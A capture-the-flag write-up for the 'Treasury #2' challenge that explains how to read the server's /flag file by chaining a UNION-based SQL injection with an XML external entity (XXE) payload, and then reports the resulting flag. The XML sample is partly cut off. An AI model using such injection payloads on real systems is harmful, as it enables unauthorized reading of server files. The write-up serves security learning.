Tags: sqli web xxe
Rating:
## Treasury #2
Before going forward, make sure to read the solution of `Treasury #1` since this part is pretty easy and just uses what we gathered in the first part.
### XXE
That being said, it is now obvious that we need to read the contents of `/flag`.
> Just if I could read files :(
Oh yes we can... XML provides us with the great feature of loading external resources using DocType Definitions (DTD), and this falls in the range of **XXE attacks** (XML eXternal Entity).
Here is the XML we'll be injecting to read the contents of `/flag` :
```xml
]>
<root>
<excerpt>&flag;</excerpt>
</root>
```
As you can see, we use a DOCTYPE definition and define `flag` as an entity that reads the `/flag` file, so when we issue `&flag;` in the `excerpt` tag, it will replace the `flag` "variable" with the contents of `/flag`. Let's see :
- **Query payload:** `' UNION SELECT ']><root><excerpt>&flag;</excerpt></root>`
- **Explanation:** nothing much to explain, we just inject the XML in the UNION query
- **Response:** `ASIS{03482b1821398ccb5214d891aed35dc87d3a77b2}`, we get the second **flag** as expected, **very COOL**.
